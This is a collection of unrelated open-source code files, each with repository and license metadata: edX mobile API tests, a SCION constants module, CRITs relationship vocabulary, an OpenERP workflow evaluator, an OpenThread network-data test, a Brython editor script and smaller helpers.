MilestoneAccessError().error_code, # 'unfulfilled_milestones'
StartDateError(self.NEXT_WEEK).error_code, # 'course_not_started'
VisibilityError().error_code, # 'not_visible_to_user'
None,
]
# Enroll in all the courses
for course in courses:
self.enroll(course.id)
# Verify courses have the correct response through error code. Last enrolled course is first course in response
response = self.api_response()
for course_index in range(len(courses)):
result = response.data[course_index]['course']['courseware_access']
self.assertEqual(result['error_code'], expected_error_codes[::-1][course_index])
if result['error_code'] is not None:
self.assertFalse(result['has_access'])
@ddt.data(
('next_week', ADVERTISED_START, ADVERTISED_START, "string"),
('next_week', None, defaultfilters.date(NEXT_WEEK, "DATE_FORMAT"), "timestamp"),
('next_week', '', defaultfilters.date(NEXT_WEEK, "DATE_FORMAT"), "timestamp"),
('default_start_date', ADVERTISED_START, ADVERTISED_START, "string"),
('default_start_date', '', None, "empty"),
('default_start_date', None, None, "empty"),
)
@ddt.unpack
@patch.dict(settings.FEATURES, {'DISABLE_START_DATES': False, 'ENABLE_MKTG_SITE': True})
def test_start_type_and_display(self, start, advertised_start, expected_display, expected_type):
"""
Tests that the correct start_type and start_display are returned in the
case the course has not started
"""
self.login()
course = CourseFactory.create(start=self.DATES[start], advertised_start=advertised_start, mobile_available=True)
self.enroll(course.id)
response = self.api_response()
self.assertEqual(response.data[0]['course']['start_type'], expected_type)
self.assertEqual(response.data[0]['course']['start_display'], expected_display)
@patch.dict(settings.FEATURES, {"ENABLE_DISCUSSION_SERVICE": True, 'ENABLE_MKTG_SITE': True})
def test_discussion_url(self):
self.login_and_enroll()
response = self.api_response()
response_discussion_url = response.data[0]['course']['discussion_url']
self.assertIn('/api/discussion/v1/courses/{}'.format(self.course.id), response_discussion_url)
def test_org_query(self):
self.login()
# Create list of courses with various organizations
courses = [
CourseFactory.create(org='edX', mobile_available=True),
CourseFactory.create(org='edX', mobile_available=True),
CourseFactory.create(org='edX', mobile_available=True, visible_to_staff_only=True),
CourseFactory.create(org='Proversity.org', mobile_available=True),
CourseFactory.create(org='MITx', mobile_available=True),
CourseFactory.create(org='HarvardX', mobile_available=True),
]
# Enroll in all the courses
for course in courses:
self.enroll(course.id)
response = self.api_response(data={'org': 'edX'})
# Test for 3 expected courses
self.assertEqual(len(response.data), 3)
# Verify only edX courses are returned
for entry in response.data:
self.assertEqual(entry['course']['org'], 'edX')
@attr(shard=9)
@override_settings(MKTG_URLS={'ROOT': 'dummy-root'})
class TestUserEnrollmentCertificates(UrlResetMixin, MobileAPITestCase, MilestonesTestCaseMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>/course_enrollments/
"""
REVERSE_INFO = {'name': 'courseenrollment-detail', 'params': ['username']}
ENABLED_SIGNALS = ['course_published']
def verify_pdf_certificate(self):
"""
Verifies the correct URL is returned in the response
for PDF certificates.
"""
self.login_and_enroll()
certificate_url = "http://test_certificate_url"
GeneratedCertificateFactory.create(
user=self.user,
course_id=self.course.id,
status=CertificateStatuses.downloadable,
mode='verified',
download_url=certificate_url,
)
response = self.api_response()
certificate_data = response.data[0]['certificate']
self.assertEquals(certificate_data['url'], certificate_url)
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_no_certificate(self):
self.login_and_enroll()
response = self.api_response()
certificate_data = response.data[0]['certificate']
self.assertDictEqual(certificate_data, {})
@patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': False, 'ENABLE_MKTG_SITE': True})
def test_pdf_certificate_with_html_cert_disabled(self):
"""
        Tests PDF certificates with CERTIFICATES_HTML_VIEW set to False.
"""
self.verify_pdf_certificate()
@patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': True, 'ENABLE_MKTG_SITE': True})
def test_pdf_certificate_with_html_cert_enabled(self):
"""
Tests PDF certificates with CERTIFICATES_HTML_VIEW set to True.
"""
self.verify_pdf_certificate()
@patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': True, 'ENABLE_MKTG_SITE': True})
def test_web_certificate(self):
CourseMode.objects.create(
course_id=self.course.id,
mode_display_name="Honor",
mode_slug=CourseMode.HONOR,
)
self.login_and_enroll()
self.course.cert_html_view_enabled = True
self.store.update_item(self.course, self.user.id)
with mock_passing_grade():
generate_user_certificates(self.user, self.course.id)
response = self.api_response()
certificate_data = response.data[0]['certificate']
self.assertRegexpMatches(
certificate_data['url'],
r'http.*/certificates/user/{user_id}/course/{course_id}'.format(
user_id=self.user.id,
course_id=self.course.id,
)
)
@attr(shard=9)
class CourseStatusAPITestCase(MobileAPITestCase):
"""
Base test class for /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
REVERSE_INFO = {'name': 'user-course-status', 'params': ['username', 'course_id']}
def setUp(self):
"""
Creates a basic course structure for our course
"""
super(CourseStatusAPITestCase, self).setUp()
self.section = ItemFactory.create(
parent=self.course,
category='chapter',
)
self.sub_section = ItemFactory.create(
parent=self.section,
category='sequential',
)
self.unit = ItemFactory.create(
parent=self.sub_section,
category='vertical',
)
self.other_sub_section = ItemFactory.create(
parent=self.section,
category='sequential',
)
self.other_unit = ItemFactory.create(
parent=self.other_sub_section,
category='vertical',
)
@attr(shard=9)
class TestCourseStatusGET(CourseStatusAPITestCase, MobileAuthUserTestMixin,
MobileCourseAccessTestMixin, MilestonesTestCaseMixin):
"""
Tests for GET of /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
def test_success(self):
self.login_and_enroll()
response = self.api_response()
self.assertEqual(
response.data["last_visited_module_id"],
unicode(self.sub_section.location)
)
self.assertEqual(
response.data["last_visited_module_path"],
[unicode(module.location) for module in [self.sub_section, self.section, self.course]]
)
@attr(shard=9)
class TestCourseStatusPATCH(CourseStatusAPITestCase, MobileAuthUserTestMixin,
MobileCourseAccessTestMixin, MilestonesTestCaseMixin):
"""
Tests for PATCH of /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
def url_method(self, url, **kwargs):
# override implementation to use PATCH method.
return self.client.patch(url, data=kwargs.get('data', None))
def test_success(self):
self.login_and_enroll()
response = self.api_response(data={"last_visited_module_id": unicode(self.other_unit.location)})
self.assertEqual(
response.data["last_visited_module_id"],
unicode(self.other_sub_section.location)
)
def test_invalid_module(self):
self.login_and_enroll()
response = self.api_response(data={"last_visited_module_id": "abc"}, expected_response_code=400)
self.assertEqual(
response.data,
errors.ERROR_INVALID_MODULE_ID
)
def test_nonexistent_module(self):
self.login_and_enroll()
non_existent_key = self.course.id.make_usage_key('video', 'non-existent')
response = self.api_response(data={"last_visited_module_id": non_existent_key}, expected_response_code=400)
self.assertEqual(
response.data,
errors.ERROR_INVALID_MODULE_ID
)
def test_no_timezone(self):
self.login_and_enroll()
past_date = datetime.datetime.now()
response = self.api_response(
data={
"last_visited_module_id": unicode(self.other_unit.location),
"modification_date": past_date.isoformat()
},
expected_response_code=400
)
self.assertEqual(
response.data,
errors.ERROR_INVALID_MODIFICATION_DATE
)
def _date_sync(self, date, initial_unit, update_unit, expected_subsection):
"""
Helper for test cases that use a modification to decide whether
to update the course status
"""
self.login_and_enroll()
# save something so we have an initial date
self.api_response(data={"last_visited_module_id": unicode(initial_unit.location)})
# now actually update it
response = self.api_response(
data={
"last_visited_module_id": unicode(update_unit.location),
"modification_date": date.isoformat()
}
)
self.assertEqual(
response.data["last_visited_module_id"],
unicode(expected_subsection.location)
)
def test_old_date(self):
self.login_and_enroll()
date = timezone.now() + datetime.timedelta(days=-100)
self._date_sync(date, self.unit, self.other_unit, self.sub_section)
def test_new_date(self):
self.login_and_enroll()
date = timezone.now() + datetime.timedelta(days=100)
self._date_sync(date, self.unit, self.other_unit, self.other_sub_section)
def test_no_initial_date(self):
self.login_and_enroll()
response = self.api_response(
data={
"last_visited_module_id": unicode(self.other_unit.location),
"modification_date": timezone.now().isoformat()
}
)
self.assertEqual(
response.data["last_visited_module_id"],
unicode(self.other_sub_section.location)
)
def test_invalid_date(self):
self.login_and_enroll()
response = self.api_response(data={"modification_date": "abc"}, expected_response_code=400)
self.assertEqual(
response.data,
errors.ERROR_INVALID_MODIFICATION_DATE
)
@attr(shard=9)
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
@override_settings(MKTG_URLS={'ROOT': 'dummy-root'})
class TestCourseEnrollmentSerializer(MobileAPITestCase, MilestonesTestCaseMixin):
"""
Test the course enrollment serializer
"""
ENABLED_SIGNALS = ['course_published']
def setUp(self):
super(TestCourseEnrollmentSerializer, self).setUp()
self.login_and_enroll()
self.request = RequestFactory().get('/')
self.request.user = self.user
def test_success(self):
serialized = CourseEnrollmentSerializer(
CourseEnrollment.enrollments_for_user(self.user)[0],
context={'request': self.request},
).data
self.assertEqual(serialized['course']['name'], self.course.display_name)
self.assertEqual(serialized['course']['number'], self.course.id.course)
self.assertEqual(serialized['course']['org'], self.course.id.org)
# Assert utm parameters
expected_utm_parameters = {
'twitter': 'utm_campaign=social-sharing-db&utm_medium=social&utm_source=twitter',
'facebook': 'utm_campaign=social-sharing-db&utm_medium=social&utm_source=facebook'
}
self.assertEqual(serialized['course']['course_sharing_utm_parameters'], expected_utm_parameters)
def test_with_display_overrides(self):
self.course.display_coursenumber = "overridden_number"
self.course.display_organization = "overridden_org"
self.store.update_item(self.course, self.user.id)
serialized = CourseEnrollmentSerializer(
CourseEnrollment.enrollments_for_user(self.user)[0],
context={'request': self.request},
).data
self.assertEqual(serialized['course']['number'], self.course.display_coursenumber)
self.assertEqual(serialized['course']['org'], self.course.display_organization)
|
teltek/edx-platform
|
lms/djangoapps/mobile_api/users/tests.py
|
Python
|
agpl-3.0
| 20,030 | 0.002646 |
# Copyright 2018 Politecnico di Torino
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
from cybertop.log import LOG
def retrieve_vnsfr_id(vnsfo_base_url, vnfd_id, attack_name, timeout):
LOG.info("Request vNSFO API call for vnsfd_id=" + vnfd_id +
" and attack type=" + attack_name)
url = vnsfo_base_url + "/vnsf/r4/running"
LOG.info("VNSFO API call: " + url)
try:
response = requests.get(url, verify=False, timeout=timeout)
LOG.info("VNSFO API response: " + response.text)
vnsfs = response.json()["vnsf"]
# search for first running instance which matches the query
for vnsf in vnsfs:
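            # Drop the trailing 5 characters of the descriptor id (presumably a fixed
            # suffix) before matching against the requested vnfd_id and attack name.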
target_vnf = vnsf['vnfd_id'][:-5].lower()
if vnfd_id[:-5].lower() in target_vnf and attack_name.lower() in target_vnf:
LOG.info("Found instance=" + vnsf['vnfr_id'] +
" for attack=" + attack_name)
return vnsf['vnfr_id']
LOG.info("No running instance found from VNSFO API.")
return None
except Exception as e:
LOG.critical("VNSFO API error: " + str(e))
return None
|
shield-h2020/dare-sec-topo
|
cybertop/vnsfo.py
|
Python
|
apache-2.0
| 1,650 | 0.000606 |
import pandas as pd
from sklearn import linear_model
import matplotlib.pyplot as plt
df = pd.read_fwf('brain_body.txt')
x_values = df[['Brain']]
y_values = df[['Body']]
#train model on data
body_reg = linear_model.LinearRegression()
body_reg.fit(x_values, y_values)
# visualise results
plt.scatter(x_values, y_values)
plt.plot(x_values, body_reg.predict(x_values))
plt.show()
|
morphean/deep-learning
|
linear-regression/linear-regression.py
|
Python
|
apache-2.0
| 380 | 0.005263 |
import sys
import time
import traceback
import javascript
from browser import document as doc, window, alert
has_ace = True
try:
editor = window.ace.edit("editor")
session = editor.getSession()
session.setMode("ace/mode/python")
editor.setOptions({
'enableLiveAutocompletion': True,
'enableSnippets': True,
'highlightActiveLine': False,
'highlightSelectedWord': True,
'autoScrollEditorIntoView': True,
        # 'maxLines': session.getLength() can be used to size the editor rows to the program length
'maxLines': 20
})
except:
from browser import html
editor = html.TEXTAREA(rows=20, cols=70)
doc["editor"] <= editor
def get_value(): return editor.value
def set_value(x):editor.value = x
editor.getValue = get_value
editor.setValue = set_value
has_ace = False
if hasattr(window, 'localStorage'):
from browser.local_storage import storage
else:
storage = None
def reset_src():
if storage is not None and "py_src" in storage:
editor.setValue(storage["py_src"])
else:
editor.setValue('for i in range(10):\n\tprint(i)')
editor.scrollToRow(0)
editor.gotoLine(0)
def reset_src_area():
if storage and "py_src" in storage:
editor.value = storage["py_src"]
else:
editor.value = 'for i in range(10):\n\tprint(i)'
class cOutput:
def __init__(self,target):
self.target = doc[target]
def write(self,data):
self.target.value += str(data)
#if "console" in doc:
sys.stdout = cOutput("console")
sys.stderr = cOutput("console")
def to_str(xx):
return str(xx)
info = sys.implementation.version
doc['version'].text = 'Brython %s.%s.%s' % (info.major, info.minor, info.micro)
output = ''
def show_console(ev):
doc["console"].value = output
doc["console"].cols = 60
doc["console"].rows = 10
# load a Python script
def load_script(evt):
_name = evt.target.value + '?foo=%s' % time.time()
editor.setValue(open(_name).read())
# run the script from the editor; returns 1 on success, 0 if an exception was raised
def run(*args):
global output
doc["console"].value = ''
src = editor.getValue()
if storage is not None:
storage["py_src"] = src
t0 = time.perf_counter()
try:
#ns = {'__name__':'__main__'}
ns = {'__name__':'editor'}
exec(src, ns)
state = 1
except Exception as exc:
traceback.print_exc(file=sys.stderr)
state = 0
output = doc["console"].value
print('<completed in %6.2f ms>' % ((time.perf_counter() - t0) * 1000.0))
return state
if has_ace:
reset_src()
else:
reset_src_area()
def clear_console(ev):
doc["console"].value = ""
doc['run'].bind('click',run)
doc['show_console'].bind('click',show_console)
doc['clear_console'].bind('click',clear_console)
|
kmolab/kmolab.github.io
|
data/py/script1.py
|
Python
|
agpl-3.0
| 2,826 | 0.008922 |
from crits.vocabulary.vocab import vocab
class RelationshipTypes(vocab):
"""
Vocabulary for Relationship Types.
"""
COMPRESSED_FROM = "Compressed From"
COMPRESSED_INTO = "Compressed Into"
CONNECTED_FROM = "Connected From"
CONNECTED_TO = "Connected To"
CONTAINS = "Contains"
CONTAINED_WITHIN = "Contained Within"
CREATED = "Created"
CREATED_BY = "Created By"
DECODED = "Decoded"
DECODED_BY = "Decoded By"
DECRYPTED = "Decrypted"
DECRYPTED_BY = "Decrypted By"
DOWNLOADED = "Downloaded"
DOWNLOADED_BY = "Downloaded By"
DOWNLOADED_FROM = "Downloaded From"
DOWNLOADED_TO = "Downloaded To"
DROPPED = "Dropped"
DROPPED_BY = "Dropped By"
INSTALLED = "Installed"
INSTALLED_BY = "Installed By"
LOADED_FROM = "Loaded From"
LOADED_INTO = "Loaded Into"
PACKED_FROM = "Packed From"
PACKED_INTO = "Packed Into"
RECEIVED_FROM = "Received From"
SENT_TO = "Sent To"
REGISTERED = "Registered"
REGISTERED_TO = "Registered To"
RELATED_TO = "Related To"
RESOLVED_TO = "Resolved To"
SENT = "Sent"
SENT_BY = "Sent By"
SUB_DOMAIN_OF = "Sub-domain Of"
SUPRA_DOMAIN_OF = "Supra-domain Of"
@classmethod
def inverse(cls, relationship=None):
"""
Return the inverse relationship of the provided relationship.
:param relationship: The relationship to get the inverse of.
:type relationship: str
:returns: str or None
"""
if relationship is None:
return None
if relationship == cls.COMPRESSED_FROM:
return cls.COMPRESSED_INTO
elif relationship == cls.COMPRESSED_INTO:
return cls.COMPRESSED_FROM
elif relationship == cls.CONNECTED_FROM:
return cls.CONNECTED_TO
elif relationship == cls.CONNECTED_TO:
return cls.CONNECTED_FROM
elif relationship == cls.CONTAINS:
return cls.CONTAINED_WITHIN
elif relationship == cls.CONTAINED_WITHIN:
return cls.CONTAINS
elif relationship == cls.CREATED:
return cls.CREATED_BY
elif relationship == cls.CREATED_BY:
return cls.CREATED
elif relationship == cls.DECODED:
return cls.DECODED_BY
elif relationship == cls.DECODED_BY:
return cls.DECODED
elif relationship == cls.DECRYPTED:
return cls.DECRYPTED_BY
elif relationship == cls.DECRYPTED_BY:
return cls.DECRYPTED
elif relationship == cls.DOWNLOADED:
return cls.DOWNLOADED_BY
elif relationship == cls.DOWNLOADED_BY:
return cls.DOWNLOADED
elif relationship == cls.DOWNLOADED_FROM:
return cls.DOWNLOADED_TO
elif relationship == cls.DOWNLOADED_TO:
return cls.DOWNLOADED_FROM
elif relationship == cls.DROPPED:
return cls.DROPPED_BY
elif relationship == cls.DROPPED_BY:
return cls.DROPPED
elif relationship == cls.INSTALLED:
return cls.INSTALLED_BY
elif relationship == cls.INSTALLED_BY:
return cls.INSTALLED
elif relationship == cls.LOADED_FROM:
return cls.LOADED_INTO
elif relationship == cls.LOADED_INTO:
return cls.LOADED_FROM
elif relationship == cls.PACKED_FROM:
return cls.PACKED_INTO
elif relationship == cls.PACKED_INTO:
return cls.PACKED_FROM
elif relationship == cls.RECEIVED_FROM:
return cls.SENT_TO
elif relationship == cls.SENT_TO:
return cls.RECEIVED_FROM
elif relationship == cls.REGISTERED:
return cls.REGISTERED_TO
elif relationship == cls.REGISTERED_TO:
return cls.REGISTERED
elif relationship == cls.RELATED_TO:
return cls.RELATED_TO
elif relationship == cls.RESOLVED_TO:
return cls.RESOLVED_TO
elif relationship == cls.SENT:
return cls.SENT_BY
elif relationship == cls.SENT_BY:
return cls.SENT
elif relationship == cls.SUB_DOMAIN_OF:
return cls.SUPRA_DOMAIN_OF
elif relationship == cls.SUPRA_DOMAIN_OF:
return cls.SUB_DOMAIN_OF
else:
return None
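# Example: RelationshipTypes.inverse(RelationshipTypes.DOWNLOADED) returns
# RelationshipTypes.DOWNLOADED_BY; unrecognized values (or None) map to None.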
|
ckane/crits
|
crits/vocabulary/relationships.py
|
Python
|
mit
| 4,362 | 0.000688 |
from .Base_Action import *
class ProfileAction(Base_Action):
def __init__(self, action_xml, root_action=None):
super(self.__class__, self).__init__(action_xml, root_action)
        self.shouldUseLaunchSchemeArgsEnv = self.contents.get('shouldUseLaunchSchemeArgsEnv')
        self.savedToolIdentifier = self.contents.get('savedToolIdentifier')
        self.useCustomWorkingDirectory = self.contents.get('useCustomWorkingDirectory')
        self.buildConfiguration = self.contents.get('buildConfiguration')
        self.debugDocumentVersioning = self.contents.get('debugDocumentVersioning')
|
samdmarshall/pyxcscheme
|
pyxcscheme/ProfileAction.py
|
Python
|
bsd-3-clause
| 611 | 0.018003 |
# Copyright 2015 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`defines` --- Constants
============================
Contains constant definitions used throughout the codebase.
"""
# Stdlib
import os
#: SCION protocol version
SCION_PROTO_VERSION = 0
#: Max TTL of a PathSegment in realtime seconds.
# TODO(shitz): This value should be externally configurable. The problem is that
# the revocation hash tree TTL needs to be at least as large as MAX_SEGMENT_TTL,
# but having a TTL of 1 day makes the hash tree generation costly enough that it
# times out on CircleCI. Thus, we should have one external config file for the
# Docker/CircleCI environment and one for production.
MAX_SEGMENT_TTL = 30 * 60
#: Time unit for HOF expiration.
EXP_TIME_UNIT = MAX_SEGMENT_TTL // 256
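# With MAX_SEGMENT_TTL = 30 * 60 = 1800 s, this works out to 1800 // 256 = 7 s per unit.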
#: Max number of supported HopByHop extensions (does not include SCMP)
MAX_HOPBYHOP_EXT = 3
#: Number of bytes per 'line'. Used for padding in many places.
LINE_LEN = 8
#: Generated files directory
GEN_PATH = 'gen'
#: Topology configuration
TOPO_FILE = "topology.yml"
#: AS configuration
AS_CONF_FILE = "as.yml"
#: Path policy config
PATH_POLICY_FILE = "path_policy.yml"
#: Networks config
NETWORKS_FILE = "networks.conf"
#: IFIDs list
IFIDS_FILE = "ifids.yml"
#: AS list
AS_LIST_FILE = "as_list.yml"
#: Buffer size for receiving packets
SCION_BUFLEN = 65535
#: Default SCION endhost data port
SCION_UDP_EH_DATA_PORT = 30041
#: Default SCION filter command port
SCION_FILTER_CMD_PORT = 30042
#: Default DNS UDP/TCP port
SCION_DNS_PORT = 30053
#: Default SCION router UDP port.
SCION_ROUTER_PORT = 50000
#: Default SCION dispatcher host addr
SCION_DISPATCHER_ADDR = "/run/shm/dispatcher.sock"
#: Default SCION dispatcher port
SCION_DISPATCHER_PORT = 3334
#: Default SCION dispatcher UNIX socket directory
DISPATCHER_DIR = "/run/shm/dispatcher"
#: Default SCION dispatcher ID
DEFAULT_DISPATCHER_ID = "default"
BEACON_SERVICE = "bs"
CERTIFICATE_SERVICE = "cs"
DNS_SERVICE = "ds"
PATH_SERVICE = "ps"
ROUTER_SERVICE = "br"
SIBRA_SERVICE = "sb"
#: All the service types
SERVICE_TYPES = (
BEACON_SERVICE,
CERTIFICATE_SERVICE,
DNS_SERVICE,
PATH_SERVICE,
ROUTER_SERVICE,
SIBRA_SERVICE,
)
#: Dispatcher registration timeout
DISPATCHER_TIMEOUT = 60
#: How often IFID packet is sent to neighboring router.
IFID_PKT_TOUT = 1
#: Default MTU - assumes overlay is ipv4+udp
DEFAULT_MTU = 1500 - 20 - 8
#: IPv6 min value
SCION_MIN_MTU = 1280
#: Length of opaque fields
OPAQUE_FIELD_LEN = 8
#: How long certain warnings should be suppresed after startup
STARTUP_QUIET_PERIOD = 30
#: Number of seconds per sibra tick
SIBRA_TICK = 4
#: How far in the future a steady path can reserve at a time.
SIBRA_MAX_STEADY_TICKS = 45
#: How far in the future an ephemeral path can reserve at a time.
SIBRA_MAX_EPHEMERAL_TICKS = 4
#: Length of steady path ID in bytes
SIBRA_STEADY_ID_LEN = 8
#: Length of ephemeral path ID in bytes
SIBRA_EPHEMERAL_ID_LEN = 16
#: SIBRA Bandwidth multiplier
SIBRA_BW_FACTOR = 16 * 1024
#: SIBRA max reservation index
SIBRA_MAX_IDX = 16
PATH_FLAG_SIBRA = "SIBRA"
MAX_HOST_ADDR_LEN = 16
# Time per Epoch
HASHTREE_EPOCH_TIME = 10
# The tolerable error in epoch in seconds.
HASHTREE_EPOCH_TOLERANCE = 5
# Max time to live
HASHTREE_TTL = MAX_SEGMENT_TTL
# Number of epochs in one TTL per interface
HASHTREE_N_EPOCHS = HASHTREE_TTL // HASHTREE_EPOCH_TIME
# How much time in advance to compute the next hash tree
HASHTREE_UPDATE_WINDOW = HASHTREE_TTL // 3
# TCP polling timeouts, used by accept() and recv().
TCP_ACCEPT_POLLING_TOUT = 1
# SCION control-plane TCP connection timeout.
TCP_TIMEOUT = 5
|
caterinaurban/Typpete
|
typpete/tests/scion_err/lib/defines.py
|
Python
|
mpl-2.0
| 4,117 | 0.000729 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sys
import openerp.netsvc as netsvc
import openerp.osv as base
import openerp.pooler as pooler
from openerp.tools.safe_eval import safe_eval as eval
class Env(dict):
def __init__(self, cr, uid, model, ids):
self.cr = cr
self.uid = uid
self.model = model
self.ids = ids
self.obj = pooler.get_pool(cr.dbname).get(model)
self.columns = self.obj._columns.keys() + self.obj._inherit_fields.keys()
def __getitem__(self, key):
if (key in self.columns) or (key in dir(self.obj)):
res = self.obj.browse(self.cr, self.uid, self.ids[0])
return res[key]
else:
return super(Env, self).__getitem__(key)
def _eval_expr(cr, ident, workitem, action):
ret=False
assert action, 'You used a NULL action in a workflow, use dummy node instead.'
for line in action.split('\n'):
line = line.strip()
uid=ident[0]
model=ident[1]
ids=[ident[2]]
if line =='True':
ret=True
elif line =='False':
ret=False
else:
env = Env(cr, uid, model, ids)
ret = eval(line, env, nocopy=True)
return ret
def execute_action(cr, ident, workitem, activity):
obj = pooler.get_pool(cr.dbname).get('ir.actions.server')
ctx = {'active_model':ident[1], 'active_id':ident[2], 'active_ids':[ident[2]]}
result = obj.run(cr, ident[0], [activity['action_id']], ctx)
return result
def execute(cr, ident, workitem, activity):
return _eval_expr(cr, ident, workitem, activity['action'])
def check(cr, workitem, ident, transition, signal):
if transition['signal'] and signal != transition['signal']:
return False
uid = ident[0]
if transition['group_id'] and uid != 1:
pool = pooler.get_pool(cr.dbname)
user_groups = pool.get('res.users').read(cr, uid, [uid], ['groups_id'])[0]['groups_id']
if not transition['group_id'] in user_groups:
return False
return _eval_expr(cr, ident, workitem, transition['condition'])
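# Illustrative sketch (hypothetical helper, not used elsewhere): a transition
# condition such as "state == 'done'" is evaluated line by line; each line is
# run through safe_eval with an Env instance as its namespace, so bare names
# resolve to fields of the browsed record, and the value of the last line is
# returned. The model name and record id below are made up.
def _example_condition_check(cr, uid):
    ident = (uid, 'sale.order', 42)
    return _eval_expr(cr, ident, None, "state == 'done'")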
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
BorgERP/borg-erp-6of3
|
server/openerp/workflow/wkf_expr.py
|
Python
|
agpl-3.0
| 3,130 | 0.007348 |
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import time
import unittest
import node
LEADER = 1
ROUTER = 2
ED1 = 3
SED1 = 4
class Cert_5_6_1_NetworkDataLeaderAsBr(unittest.TestCase):
def setUp(self):
self.nodes = {}
for i in range(1,5):
self.nodes[i] = node.Node(i)
self.nodes[LEADER].set_panid(0xface)
self.nodes[LEADER].set_mode('rsdn')
self.nodes[LEADER].add_whitelist(self.nodes[ROUTER].get_addr64())
self.nodes[LEADER].enable_whitelist()
self.nodes[ROUTER].set_panid(0xface)
self.nodes[ROUTER].set_mode('rsdn')
self.nodes[ROUTER].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[ROUTER].add_whitelist(self.nodes[ED1].get_addr64())
self.nodes[ROUTER].add_whitelist(self.nodes[SED1].get_addr64())
self.nodes[ROUTER].enable_whitelist()
self.nodes[ROUTER].set_router_selection_jitter(1)
self.nodes[ED1].set_panid(0xface)
self.nodes[ED1].set_mode('rsn')
self.nodes[ED1].add_whitelist(self.nodes[ROUTER].get_addr64())
self.nodes[ED1].enable_whitelist()
self.nodes[SED1].set_panid(0xface)
self.nodes[SED1].set_mode('s')
self.nodes[SED1].add_whitelist(self.nodes[ROUTER].get_addr64())
self.nodes[SED1].enable_whitelist()
self.nodes[SED1].set_timeout(3)
def tearDown(self):
for node in list(self.nodes.values()):
node.stop()
del self.nodes
def test(self):
self.nodes[LEADER].start()
self.nodes[LEADER].set_state('leader')
self.assertEqual(self.nodes[LEADER].get_state(), 'leader')
self.nodes[LEADER].add_prefix('2001:2:0:1::/64', 'paros')
self.nodes[LEADER].add_prefix('2001:2:0:2::/64', 'paro')
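        # The flag strings are assumed to spell p(referred), a (SLAAC),
        # r (default route), o (on-mesh) and s (stable); only the first prefix
        # is marked stable, and sleepy children only receive the stable subset
        # of the network data, which is why SED1 is expected to get an address
        # from 2001:2:0:1 but not from 2001:2:0:2 below.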
self.nodes[LEADER].register_netdata()
self.nodes[ROUTER].start()
time.sleep(5)
self.assertEqual(self.nodes[ROUTER].get_state(), 'router')
self.nodes[ED1].start()
time.sleep(5)
self.assertEqual(self.nodes[ED1].get_state(), 'child')
self.nodes[SED1].start()
time.sleep(5)
self.assertEqual(self.nodes[SED1].get_state(), 'child')
addrs = self.nodes[ED1].get_addrs()
self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
self.assertTrue(any('2001:2:0:2' in addr[0:10] for addr in addrs))
for addr in addrs:
if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
self.assertTrue(self.nodes[LEADER].ping(addr))
addrs = self.nodes[SED1].get_addrs()
self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
